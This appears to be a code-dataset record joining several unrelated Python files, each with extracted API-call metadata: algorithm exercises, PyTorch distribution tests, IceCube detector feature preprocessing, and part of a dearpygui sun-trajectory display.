    used instead of this older method, which converts to lower().
    """
    i = 0
    j = len(s) - 1
    while i < j:
        # Advance i to the next letter (or until it meets j).
        while i < j and not s[i].isalpha():
            i += 1
        # Retreat j to the previous letter (or until it meets i).
        while i < j and not s[j].isalpha():
            j -= 1
        # If i == j both indices sit on the same character, which always
        # matches itself; otherwise compare the two letters case-insensitively.
        if s[i].lower() != s[j].lower():
            return False
        i += 1
        j -= 1
    return True
def tournament_allows_odd(A):
    """
    Returns two largest values in A via a single-elimination tournament.
    Works for odd lists: when len(A) is odd the final value sits out the
    tournament and is merged into the result afterwards.

    :param A: list of at least two mutually comparable values
    :return: tuple (largest, second largest)
    :raises ValueError: if A contains fewer than two values
    """
    from ch01.largest_two import Match
    if len(A) < 2:
        raise ValueError('Must have at least two values')
    # Pair up adjacent values into first-round matches.
    tourn = []
    for i in range(0, len(A)-1, 2):
        tourn.append(Match(A[i], A[i+1]))
    odd_one_out = None
    if len(A) % 2 == 1:
        odd_one_out = A[-1]
    # Advance winners round by round until one championship match remains.
    while len(tourn) > 1:
        tourn.append(Match.advance(tourn[0], tourn[1]))
        del tourn[0:2]
    # Find where second is hiding!
    m = tourn[0]
    largest = m.larger
    second = m.smaller
    # Wait until the end, and see where the benched value belongs.
    # Bug fix: test against None rather than truthiness -- a falsy leftover
    # such as 0 was silently ignored (e.g. [-5, -3, 0] returned (-3, -5)
    # instead of (0, -3)).
    if odd_one_out is not None:
        if odd_one_out > largest:
            largest,second = odd_one_out,largest
        elif odd_one_out > second:
            second = odd_one_out
    # The true runner-up must have lost directly to the champion, so walk
    # the champion's chain of prior matches.
    while m.prior:
        m = m.prior
        if second < m.smaller:
            second = m.smaller
    return (largest,second)
def two_largest_attempt(A):
    """Failed attempt to implement two largest.

    Takes the max of each half of A; this fails whenever the two largest
    values happen to live in the same half (kept intentionally broken as a
    teaching example -- see the __main__ demo).
    """
    half = len(A) // 2
    left_best = max(A[:half])
    right_best = max(A[half:])
    if left_best < right_best:
        return (right_best, left_best)
    return (left_best, right_best)
#######################################################################
if __name__ == '__main__':
    chapter = 1
    # Exercise 1: palindrome detection ignoring punctuation and case.
    with ExerciseNum(1) as exercise_number:
        sample = 'A man, a plan, a canal. Panama!'
        print(sample,'is a palindrome:', is_palindrome_letters_only(sample))
        print(caption(chapter, exercise_number),
              'Palindrome Detector')
    # Exercise 2: compare comparison counts and timings of the two median
    # strategies (quickselect vs sort-based).
    with ExerciseNum(2) as exercise_number:
        run_median_less_than_trial()
        print()
        run_median_trial()
        print(caption(chapter, exercise_number),
              'Median Counting')
    # Exercise 3: benchmark the two counting-sort variants.
    with ExerciseNum(3) as exercise_number:
        run_counting_sort_trials()
        print(caption(chapter, exercise_number),
              'Counting Sort Trials')
    # Exercise 4: tournament algorithm extended to odd-length lists.
    with ExerciseNum(4) as exercise_number:
        print('see tournament_allows_odd in ch01.challenge')
        print(caption(chapter, exercise_number),
              'Odd tournament')
    # Exercise 5: demonstrate why the split-in-half approach is wrong.
    with ExerciseNum(5) as exercise_number:
        print('Should print (9, 8)', two_largest_attempt([9, 3, 5, 7, 8, 1]))
        print('Fails to print (9, 8)', two_largest_attempt([9, 8, 5, 7, 3, 1]))
        print(caption(chapter, exercise_number),
              'Failed Two largest')
| [
"random.shuffle",
"algs.table.caption",
"ch01.largest_two.Match.advance",
"algs.counting.RecordedItem.report",
"algs.counting.RecordedItem.clear",
"algs.table.ExerciseNum",
"ch01.largest_two.Match",
"algs.counting.RecordedItem",
"algs.table.DataTable",
"random.randint"
] | [((2712, 2803), 'algs.table.DataTable', 'DataTable', (['[8, 15, 15]', "['N', 'counting_sort', 'counting_sort_improved']"], {'output': 'output'}), "([8, 15, 15], ['N', 'counting_sort', 'counting_sort_improved'],\n output=output)\n", (2721, 2803), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((3774, 3834), 'algs.table.DataTable', 'DataTable', (['[10, 15, 15]', "['N', 'median_time', 'sort_median']"], {}), "([10, 15, 15], ['N', 'median_time', 'sort_median'])\n", (3783, 3834), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((4685, 4772), 'algs.table.DataTable', 'DataTable', (['[10, 15, 15]', "['N', 'median_count', 'sort_median_count']"], {'output': 'output'}), "([10, 15, 15], ['N', 'median_count', 'sort_median_count'], output=\n output)\n", (4694, 4772), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((1307, 1329), 'random.randint', 'random.randint', (['lo', 'hi'], {}), '(lo, hi)\n', (1321, 1329), False, 'import random\n'), ((4975, 4992), 'random.shuffle', 'random.shuffle', (['A'], {}), '(A)\n', (4989, 4992), False, 'import random\n'), ((5052, 5072), 'algs.counting.RecordedItem.clear', 'RecordedItem.clear', ([], {}), '()\n', (5070, 5072), False, 'from algs.counting import RecordedItem\n'), ((5167, 5187), 'algs.counting.RecordedItem.clear', 'RecordedItem.clear', ([], {}), '()\n', (5185, 5187), False, 'from algs.counting import RecordedItem\n'), ((8029, 8043), 'algs.table.ExerciseNum', 'ExerciseNum', (['(1)'], {}), '(1)\n', (8040, 8043), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8288, 8302), 'algs.table.ExerciseNum', 'ExerciseNum', (['(2)'], {}), '(2)\n', (8299, 8302), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8495, 8509), 'algs.table.ExerciseNum', 'ExerciseNum', (['(3)'], {}), '(3)\n', (8506, 8509), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8662, 8676), 'algs.table.ExerciseNum', 'ExerciseNum', (['(4)'], {}), '(4)\n', 
(8673, 8676), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8849, 8863), 'algs.table.ExerciseNum', 'ExerciseNum', (['(5)'], {}), '(5)\n', (8860, 8863), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((5133, 5154), 'algs.counting.RecordedItem.report', 'RecordedItem.report', ([], {}), '()\n', (5152, 5154), False, 'from algs.counting import RecordedItem\n'), ((5237, 5258), 'algs.counting.RecordedItem.report', 'RecordedItem.report', ([], {}), '()\n', (5256, 5258), False, 'from algs.counting import RecordedItem\n'), ((7052, 7073), 'ch01.largest_two.Match', 'Match', (['A[i]', 'A[i + 1]'], {}), '(A[i], A[i + 1])\n', (7057, 7073), False, 'from ch01.largest_two import Match\n'), ((7196, 7229), 'ch01.largest_two.Match.advance', 'Match.advance', (['tourn[0]', 'tourn[1]'], {}), '(tourn[0], tourn[1])\n', (7209, 7229), False, 'from ch01.largest_two import Match\n'), ((8206, 8239), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (8213, 8239), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8417, 8450), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (8424, 8450), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8579, 8612), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (8586, 8612), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((8772, 8805), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (8779, 8805), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((9056, 9089), 'algs.table.caption', 'caption', (['chapter', 'exercise_number'], {}), '(chapter, exercise_number)\n', (9063, 9089), False, 'from algs.table import DataTable, ExerciseNum, caption\n'), ((4931, 4946), 'algs.counting.RecordedItem', 'RecordedItem', (['i'], {}), '(i)\n', (4943, 
4946), False, 'from algs.counting import RecordedItem\n')] |
import torch
import pytest
# NOTE: also registers the KL divergence
from chmp.torch_utils import NormalModule, WeightsHS, fixed
def test_kl_divergence__gamma__log_normal():
    """kl_divergence(LogNormal, Gamma) must be registered (by chmp.torch_utils)."""
    log_normal = torch.distributions.LogNormal(torch.zeros(2), torch.ones(2))
    gamma = torch.distributions.Gamma(torch.ones(2), torch.ones(2))
    # Raises NotImplementedError if the pair has no registered KL kernel.
    torch.distributions.kl_divergence(log_normal, gamma)
def test__module_parameters():
    """Only non-fixed tensors should appear among the trainable parameters."""
    def param_names(mod):
        return {name for name, _ in mod.named_parameters()}

    only_loc = NormalModule(loc=torch.zeros(1), scale=fixed(torch.ones(1)))
    assert param_names(only_loc) == {"loc"}

    both_free = NormalModule(loc=torch.zeros(1), scale=torch.ones(1))
    assert param_names(both_free) == {"loc", "scale"}

    positional_loc = NormalModule(torch.zeros(1), scale=fixed(torch.ones(1)))
    assert param_names(positional_loc) == {"loc"}
def test__module_fixed_parameters_optimize():
    """Optimization must move the free loc but leave the fixed scale at 1."""
    dist = NormalModule(torch.zeros(1), fixed(torch.ones(1)))
    optimizer = torch.optim.Adam(dist.parameters(), lr=0.1)

    for _step in range(100):
        optimizer.zero_grad()
        sample = dist.rsample((20,))
        loss = torch.mean((sample - 2.0) ** 2.0)
        loss.backward()
        optimizer.step()

    assert float(dist.loc) != pytest.approx(0.0)
    assert float(dist.scale) == pytest.approx(1.0)
def test_weight_hs_api():
    """WeightsHS samples have the requested shape; KL divergence is a scalar."""
    weights = WeightsHS([10, 20, 30], tau_0=1e-5)
    assert weights().shape == (10, 20, 30)
    assert weights.kl_divergence().shape == ()
| [
"pytest.approx",
"torch.mean",
"torch.distributions.kl_divergence",
"chmp.torch_utils.WeightsHS",
"torch.zeros",
"torch.ones"
] | [((314, 353), 'torch.distributions.kl_divergence', 'torch.distributions.kl_divergence', (['p', 'q'], {}), '(p, q)\n', (347, 353), False, 'import torch\n'), ((1303, 1339), 'chmp.torch_utils.WeightsHS', 'WeightsHS', (['[10, 20, 30]'], {'tau_0': '(1e-05)'}), '([10, 20, 30], tau_0=1e-05)\n', (1312, 1339), False, 'from chmp.torch_utils import NormalModule, WeightsHS, fixed\n'), ((214, 228), 'torch.zeros', 'torch.zeros', (['(2)'], {}), '(2)\n', (225, 228), False, 'import torch\n'), ((230, 243), 'torch.ones', 'torch.ones', (['(2)'], {}), '(2)\n', (240, 243), False, 'import torch\n'), ((279, 292), 'torch.ones', 'torch.ones', (['(2)'], {}), '(2)\n', (289, 292), False, 'import torch\n'), ((294, 307), 'torch.ones', 'torch.ones', (['(2)'], {}), '(2)\n', (304, 307), False, 'import torch\n'), ((695, 709), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (706, 709), False, 'import torch\n'), ((877, 891), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (888, 891), False, 'import torch\n'), ((1083, 1111), 'torch.mean', 'torch.mean', (['((x - 2.0) ** 2.0)'], {}), '((x - 2.0) ** 2.0)\n', (1093, 1111), False, 'import torch\n'), ((1195, 1213), 'pytest.approx', 'pytest.approx', (['(0.0)'], {}), '(0.0)\n', (1208, 1213), False, 'import pytest\n'), ((1248, 1266), 'pytest.approx', 'pytest.approx', (['(1.0)'], {}), '(1.0)\n', (1261, 1266), False, 'import pytest\n'), ((417, 431), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (428, 431), False, 'import torch\n'), ((557, 571), 'torch.zeros', 'torch.zeros', (['(1)'], {}), '(1)\n', (568, 571), False, 'import torch\n'), ((579, 592), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (589, 592), False, 'import torch\n'), ((899, 912), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (909, 912), False, 'import torch\n'), ((445, 458), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (455, 458), False, 'import torch\n'), ((723, 736), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (733, 736), False, 'import torch\n')] |
import torch
from torch_geometric.data import Data
from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute
from graphnet.data.constants import FEATURES
from graphnet.models.detector.detector import Detector
class IceCube86(Detector):
    """`Detector` class for IceCube-86."""

    # Implementing abstract class attribute
    features = FEATURES.ICECUBE86

    def _forward(self, data: Data) -> Data:
        """Ingests data, builds graph (connectivity/adjacency), and preprocesses features.

        Args:
            data (Data): Input graph data.

        Returns:
            Data: Connected and preprocessed graph data.
        """
        # Check(s)
        self._validate_features(data)

        # Scale each feature column in place (column order follows
        # FEATURES.ICECUBE86).
        x = data.x
        x[:, 0] /= 100.    # dom_x
        x[:, 1] /= 100.    # dom_y
        x[:, 2] += 350.    # dom_z: shift, then scale
        x[:, 2] /= 100.
        x[:, 3] /= 1.05e+04  # dom_time: scale, centre, re-expand
        x[:, 3] -= 1.
        x[:, 3] *= 20.
        x[:, 4] /= 1.      # charge (left unscaled)
        x[:, 5] -= 1.25    # rde
        x[:, 5] /= 0.25
        x[:, 6] /= 0.05    # pmt_area

        return data
class IceCubeDeepCore(IceCube86):
    """`Detector` class for IceCube-DeepCore."""
    # Inherits the IceCube-86 feature list and `_forward` preprocessing
    # unchanged -- no DeepCore-specific overrides are defined here.
class IceCubeUpgrade(IceCubeDeepCore):
    """`Detector` class for IceCube-Upgrade."""

    # Implementing abstract class attribute
    features = FEATURES.UPGRADE

    def _forward(self, data: Data) -> Data:
        """Ingests data, builds graph (connectivity/adjacency), and preprocesses features.

        Args:
            data (Data): Input graph data.

        Returns:
            Data: Connected and preprocessed graph data.
        """
        # Check(s)
        self._validate_features(data)

        # In-place per-column scaling (column order follows FEATURES.UPGRADE).
        x = data.x
        x[:, 0] /= 500.                        # dom_x
        x[:, 1] /= 500.                        # dom_y
        x[:, 2] /= 500.                        # dom_z
        x[:, 3] /= 2e+04                       # dom_time
        x[:, 3] -= 1.
        x[:, 4] = torch.log10(x[:, 4]) / 2.    # charge (log-compressed)
        # Column 5 (rde) is left as-is.
        x[:, 6] /= 0.05                        # pmt_area
        x[:, 7] -= 50.                         # string
        x[:, 7] /= 50.
        x[:, 8] /= 20.                         # pmt_number
        x[:, 9] -= 60.                         # dom_number
        x[:, 9] /= 60.
        # Columns 10-12 (pmt_dir_x/y/z) are left as-is.
        x[:, 13] /= 130.                       # dom_type

        return data
class IceCubeUpgrade_V2(IceCubeDeepCore):
    """`Detector` class for IceCube-Upgrade, with engineered per-pulse features."""

    # Implementing abstract class attribute
    features = FEATURES.UPGRADE

    @property
    def nb_outputs(self):
        # Three engineered features are appended to the raw inputs in _forward.
        return self.nb_inputs + 3

    def _forward(self, data: Data) -> Data:
        """Ingests data, builds graph (connectivity/adjacency), and preprocesses features.

        Args:
            data (Data): Input graph data.

        Returns:
            Data: Connected and preprocessed graph data, with three extra
                columns appended to `data.x`: photoelectrons per PMT,
                distance to the charge-weighted centre of gravity, and the
                cosine of the angle between the PMT direction and the
                direction to that centre of gravity.
        """
        # Check(s)
        self._validate_features(data)

        # Assign pulse cluster indices to DOMs and PMTs, respectively
        data = group_pulses_to_dom(data)
        data = group_pulses_to_pmt(data)

        # Feature engineering inspired by Linea Hedemark and Tetiana Kozynets.
        xyz = torch.stack((data['dom_x'], data['dom_y'], data['dom_z']), dim=1)
        # Bug fix: use all three PMT direction components; the original
        # stacked 'pmt_dir_x' three times, corrupting the cosine-angle
        # feature computed below.
        pmt_dir = torch.stack((data['pmt_dir_x'], data['pmt_dir_y'], data['pmt_dir_z']), dim=1)
        charge = data['charge'].unsqueeze(dim=1)

        # Charge-weighted centre of gravity, broadcast back to every pulse.
        center_of_gravity = sum_pool_and_distribute(xyz * charge, data.batch) / sum_pool_and_distribute(charge, data.batch)
        vector_to_center_of_gravity = center_of_gravity - xyz
        distance_to_center_of_gravity = torch.norm(vector_to_center_of_gravity, p=2, dim=1)
        # The +1e-3 guards against division by zero for pulses at the centre.
        unit_vector_to_center_of_gravity = vector_to_center_of_gravity / (distance_to_center_of_gravity.unsqueeze(dim=1) + 1e-3)
        cos_angle_wrt_center_of_gravity = (pmt_dir * unit_vector_to_center_of_gravity).sum(dim=1)
        photoelectrons_on_pmt = sum_pool_and_distribute(data['charge'], data.pmt_index, data.batch).floor().clip(1, None)

        # Add new features
        data.x = torch.cat((
            data.x,
            photoelectrons_on_pmt.unsqueeze(dim=1),
            distance_to_center_of_gravity.unsqueeze(dim=1),
            cos_angle_wrt_center_of_gravity.unsqueeze(dim=1),
        ), dim=1)

        # Preprocessing
        data.x[:,0] /= 500.  # dom_x
        data.x[:,1] /= 500.  # dom_y
        data.x[:,2] /= 500.  # dom_z
        data.x[:,3] /= 2e+04 # dom_time
        data.x[:,3] -= 1.
        data.x[:,4] = torch.log10(data.x[:,4]) / 2.  # charge
        #data.x[:,5] /= 1.  # rde
        data.x[:,6] /= 0.05  # pmt_area
        data.x[:,7] -= 50.  # string
        data.x[:,7] /= 50.
        data.x[:,8] /= 20.  # pmt_number
        data.x[:,9] -= 60.  # dom_number
        data.x[:,9] /= 60.
        #data.x[:,10] /= 1.  # pmt_dir_x
        #data.x[:,11] /= 1.  # pmt_dir_y
        #data.x[:,12] /= 1.  # pmt_dir_z
        data.x[:,13] /= 130.  # dom_type

        # -- Engineered features
        data.x[:,14] = torch.log10(data.x[:,14]) / 2.  # photoelectrons_on_pmt
        data.x[:,15] = torch.log10(1e-03 + data.x[:,15]) / 2.  # distance_to_center_of_gravity

        return data
return data | [
"graphnet.components.pool.group_pulses_to_dom",
"torch.stack",
"torch.log10",
"graphnet.components.pool.group_pulses_to_pmt",
"graphnet.components.pool.sum_pool_and_distribute",
"torch.norm"
] | [((3121, 3146), 'graphnet.components.pool.group_pulses_to_dom', 'group_pulses_to_dom', (['data'], {}), '(data)\n', (3140, 3146), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n'), ((3162, 3187), 'graphnet.components.pool.group_pulses_to_pmt', 'group_pulses_to_pmt', (['data'], {}), '(data)\n', (3181, 3187), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n'), ((3282, 3347), 'torch.stack', 'torch.stack', (["(data['dom_x'], data['dom_y'], data['dom_z'])"], {'dim': '(1)'}), "((data['dom_x'], data['dom_y'], data['dom_z']), dim=1)\n", (3293, 3347), False, 'import torch\n'), ((3366, 3443), 'torch.stack', 'torch.stack', (["(data['pmt_dir_x'], data['pmt_dir_x'], data['pmt_dir_x'])"], {'dim': '(1)'}), "((data['pmt_dir_x'], data['pmt_dir_x'], data['pmt_dir_x']), dim=1)\n", (3377, 3443), False, 'import torch\n'), ((3719, 3770), 'torch.norm', 'torch.norm', (['vector_to_center_of_gravity'], {'p': '(2)', 'dim': '(1)'}), '(vector_to_center_of_gravity, p=2, dim=1)\n', (3729, 3770), False, 'import torch\n'), ((1981, 2006), 'torch.log10', 'torch.log10', (['data.x[:, 4]'], {}), '(data.x[:, 4])\n', (1992, 2006), False, 'import torch\n'), ((3521, 3570), 'graphnet.components.pool.sum_pool_and_distribute', 'sum_pool_and_distribute', (['(xyz * charge)', 'data.batch'], {}), '(xyz * charge, data.batch)\n', (3544, 3570), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n'), ((3573, 3616), 'graphnet.components.pool.sum_pool_and_distribute', 'sum_pool_and_distribute', (['charge', 'data.batch'], {}), '(charge, data.batch)\n', (3596, 3616), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n'), ((4614, 4639), 'torch.log10', 'torch.log10', (['data.x[:, 4]'], {}), '(data.x[:, 4])\n', (4625, 4639), False, 'import torch\n'), ((5122, 5148), 
'torch.log10', 'torch.log10', (['data.x[:, 14]'], {}), '(data.x[:, 14])\n', (5133, 5148), False, 'import torch\n'), ((5201, 5235), 'torch.log10', 'torch.log10', (['(0.001 + data.x[:, 15])'], {}), '(0.001 + data.x[:, 15])\n', (5212, 5235), False, 'import torch\n'), ((4030, 4097), 'graphnet.components.pool.sum_pool_and_distribute', 'sum_pool_and_distribute', (["data['charge']", 'data.pmt_index', 'data.batch'], {}), "(data['charge'], data.pmt_index, data.batch)\n", (4053, 4097), False, 'from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute\n')] |
import dearpygui.dearpygui as dpg
import datetime as dt
import math
from registry import *
SUN_DATA.update_date()  # sync SUN_DATA with the current date/time at import
# FUNCTIONS
def get_semi_circle_points( center, radius, angle_i, angle_f, segments = 360, closed = False ):
    """Return the 2-D points of a circular arc around `center`.

    The arc spans from `angle_i` to `angle_f` (radians), sampled at
    `segments` points; the end angle itself is excluded.  Screen
    coordinates are assumed (y grows downward), hence the `-sin` term.

    When `closed` is True, three anchor points (top of the circle, the
    center, and the rightmost point) are prepended so the polyline can be
    drawn as a closed shape.
    """
    points_close = [[ center[0], center[1]-radius ] , center, [ center[0] + radius, center[1] ] ]
    step = (angle_f - angle_i) / segments
    # BUG FIX: the original computed the sample angles relative to 0 and
    # never added angle_i, so the arc always started at angle 0 regardless
    # of the requested start angle.  Behavior is unchanged for angle_i == 0.
    angles = [ angle_i + step*n for n in range(segments) ]
    points = [ [ center[0] + radius*math.cos(ang), center[1] - radius*math.sin(ang) ] for ang in angles ]
    if closed:
        points_close.extend( points )
        return points_close
    else:
        return points
def draw_sun_trajetory( draw_id, parent_id, all_day = False, extremes = False ):
    """Draw the sun-path diagram (compass disc, sunrise/sunset rays, daily
    trajectory and current sun marker) onto the drawlist `draw_id`.

    Item tags are derived from ``draw_id * 100`` so that
    ``update_sun_trajetory`` can later reconfigure the same items.
    `extremes` is accepted for interface compatibility but is not used.
    """
    canvas_w = dpg.get_item_width( draw_id )
    canvas_h = dpg.get_item_height( draw_id )
    center = [ canvas_w//2, canvas_h//2 ]
    if canvas_w+20 <= canvas_h:
        r = canvas_w//2 - 20
    else:
        r = canvas_h//2 - 20
    id_link = draw_id*100
    # Azimuths of the sunrise and sunset rays
    azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
    alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1]
    def _project(az, al):
        # Map an (azimuth, altitude) pair onto the 2-D compass disc;
        # azimuth is rotated by -90 deg so that North points up.
        ang = az - math.pi/2
        return [ center[0] + math.cos(ang)*r, center[1] + math.sin(ang)*math.cos(al)*r ]
    dots = [ _project(az, al) for az, al, _ in SUN_DATA.trajetory(100, all_day ) ]
    sun = _project( SUN_DATA.azi, SUN_DATA.alt )
    # East-west base line, sunrise ray, sunset ray
    dpg.draw_line( parent = draw_id, tag = id_link+1 , p1 = [center[0] - r, center[1]] , p2 = [center[0] + r, center[1]] , color = COLOR['gray'](155) , thickness = 1 )
    dpg.draw_line( parent = draw_id, tag = id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)], color = COLOR['orange'](155), thickness = 2 )
    dpg.draw_line( parent = draw_id, tag = id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)], color = COLOR['gray'](200) , thickness = 2 )
    # Outer compass circle and its center dot
    dpg.draw_circle( parent = draw_id, tag = id_link+4 , center = center , radius = r , color = COLOR['white'](200) , fill = COLOR['white'](10 ), thickness = 3 )
    dpg.draw_circle( parent = draw_id, tag = id_link+5 , center = center , radius = 3 , color = COLOR['white'](200) , fill = COLOR['white'](255), thickness = 2 )
    # Cardinal-point labels
    dpg.draw_text( parent = draw_id, tag = id_link+6 , pos = [center[0] -(r +20), center[1] -10 ] , text = 'W' , color = COLOR['white'](200) , size = 20 )
    dpg.draw_text( parent = draw_id, tag = id_link+7 , pos = [center[0] +(r +5) , center[1] -10 ] , text = 'E' , color = COLOR['white'](200) , size = 20 )
    dpg.draw_text( parent = draw_id, tag = id_link+8 , pos = [center[0] -10 , center[1] -(r +25)], text = 'N' , color = COLOR['white'](255) , size = 20 )
    # Trajectory polyline plus one color-graded dot per sample
    dpg.draw_polyline( parent = draw_id, tag = id_link+9 , points = dots , color = COLOR['red'](155) , thickness = 2 , closed = False )
    for n, p in enumerate(dots):
        dpg.draw_circle( parent = draw_id, tag = id_link+(12+n) , center = p , radius = 2 , color = [n*4, 255-n*2, n*2, 255] )
    # Current sun position: ray from the center plus the sun marker
    dpg.draw_line( parent = draw_id, tag = id_link+10 , p1 = center, p2 = sun, color = COLOR['yellow'](200) , thickness = 2 )
    dpg.draw_circle( parent = draw_id, tag = id_link+11 , center = sun , radius = 10 , color = COLOR['yellow'](155) , fill = COLOR['yellow'](255) )
def update_sun_trajetory( draw_id, parent_id, all_day = False ):
    """Recompute and reposition every item previously created by
    ``draw_sun_trajetory`` on the drawlist `draw_id` (items are addressed
    through the same ``draw_id * 100`` tag scheme).

    Fix: removed the unused ``w, h = dpg.get_item_width('mainWindow'), ...``
    locals that the original computed and never read.
    """
    # Central point, canvas size and disc radius
    width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
    center = [ width//2, height//2 ]
    r = width//2 - 20 if width+20 <= height else height//2 - 20
    id_link = draw_id*100
    # Azimuths of the sunrise and sunset rays
    azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
    alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1]
    # Trajectory samples projected onto the 2-D compass disc
    # (azimuth rotated by -90 deg so North points up)
    dots = SUN_DATA.trajetory(100, all_day )
    dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
    dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
    # Current sun position, same projection
    sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
    sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
    # Reconfigure the static items (lines, circle, labels)
    dpg.configure_item( id_link+1 , p1 = [center[0] - r, center[1]], p2 = [center[0] + r, center[1]] )
    dpg.configure_item( id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)] )
    dpg.configure_item( id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)] )
    dpg.configure_item( id_link+4 , center = center , radius = r )
    dpg.configure_item( id_link+5 , center = center , radius = 3 )
    dpg.configure_item( id_link+6 , pos = [center[0] - (r + 20), center[1] -10 ] )
    dpg.configure_item( id_link+7 , pos = [center[0] + (r + 5), center[1] -10 ] )
    dpg.configure_item( id_link+8 , pos = [center[0] - 10 , center[1] - (r + 25) ] )
    # Reconfigure the trajectory, its per-sample dots, and the sun marker
    dpg.configure_item( id_link+9 , points = dots )
    dpg.configure_item( id_link+10, p1 = center , p2 = sun )
    dpg.configure_item( id_link+11, center = sun )
    for n, p in enumerate(dots):
        dpg.configure_item( id_link+(12+n) , center = p )
def att_sunpos_graphs( ):
    """Refresh the azimuth (tags 22_1x) and altitude (tags 22_2x) day plots.

    Uses the manual date widgets when HORA_MANUAL is set, otherwise the
    current UTC time; SUN_DATA's date is restored afterwards so the call
    has no lasting side effect on the shared state.
    """
    last_date = SUN_DATA.date
    if not dpg.get_value( HORA_MANUAL ):
        SUN_DATA.set_date( dt.datetime.utcnow() )
    else:
        SUN_DATA.set_date( dt.datetime( dpg.get_value(YEAR), dpg.get_value(MONTH), dpg.get_value(DAY), dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND) ) )
    azi_alt = SUN_DATA.trajetory( 50, all_day = False )
    SUN_DATA.set_date( last_date )  # restore shared state (the original restored it twice)
    AZI = []
    ALT = []
    PTI = []
    for azi, alt, tim in azi_alt:
        # Azimuth is re-centered by 180 deg so the curve runs 0..360.
        # NOTE(review): the current-point series below does NOT apply the
        # same shift — confirm whether that is intentional.
        AZI.append( math.degrees(azi - math.pi) if azi > math.pi else math.degrees(azi + math.pi) )
        ALT.append( math.degrees(alt) if alt < math.pi else 0 )
        PTI.append( int( dt.datetime.timestamp( tim )) )
    azi, alt = [math.degrees(SUN_DATA.azi)], [math.degrees(SUN_DATA.alt)]
    # BUG FIX: the x value of the "current point" series is a POSIX
    # timestamp, exactly like PTI; the original wrapped it in
    # math.degrees(), which scaled it by 180/pi and pushed the marker far
    # off the time axis.
    time_scrt = [ dt.datetime.timestamp( last_date ) ]
    dpg.configure_item (22_13, x = PTI      , y = AZI )
    dpg.configure_item (22_14, x = time_scrt, y = azi )
    dpg.set_axis_limits(22_11, ymin = PTI[0]   , ymax = PTI[-1] )
    dpg.configure_item (22_23, x = PTI      , y = ALT )
    dpg.configure_item (22_24, x = time_scrt, y = alt )
    dpg.set_axis_limits(22_21, ymin = PTI[0]   , ymax = PTI[-1] )
# MAIN FUNCTIONS
def init_visualizacaoGeral( windows : dict ):
    """Build the 'Visualizacao geral' screen.

    Creates three windows — the sun-position drawlist (tag 21_0), the
    azimuth/altitude day plots (tag 22_0) and the log/settings panel
    (tag 23_0) — appends each to windows["Visualizacao geral"], and hides
    all three at the end.  Numeric tags use Python underscore digit
    separators (e.g. 21_0 == 210).
    """
    # SUN POSITION window with the compass drawlist
    with dpg.window( label = 'Posição solar' , tag = 21_0, pos = [50,50], width = 500 , height = 500 , no_move = True, no_resize = True, no_collapse = True, no_close = True, no_title_bar= True ) as Posicao_sol_VG:
        windows["Visualizacao geral"].append( Posicao_sol_VG )
        w, h = dpg.get_item_width(2_1_0), dpg.get_item_height(2_1_0)
        dpg.add_drawlist ( tag = 21_1_0, width = w-20 , height = h-50, label = 'Solar')
        draw_sun_trajetory ( draw_id = 2_1_1_0, parent_id = 2_1_0 )
    # SUN-POSITION DISPLAY — uses plots, same layout as the tooltip
    with dpg.window( label = 'Atuação' , tag = 22_0, no_move = True , no_resize = True, no_collapse = True, no_close = True ) as Atuacao_VG:
        windows["Visualizacao geral"].append( Atuacao_VG )
        dpg.add_text('Área para a atução da posição dos paineis solares')
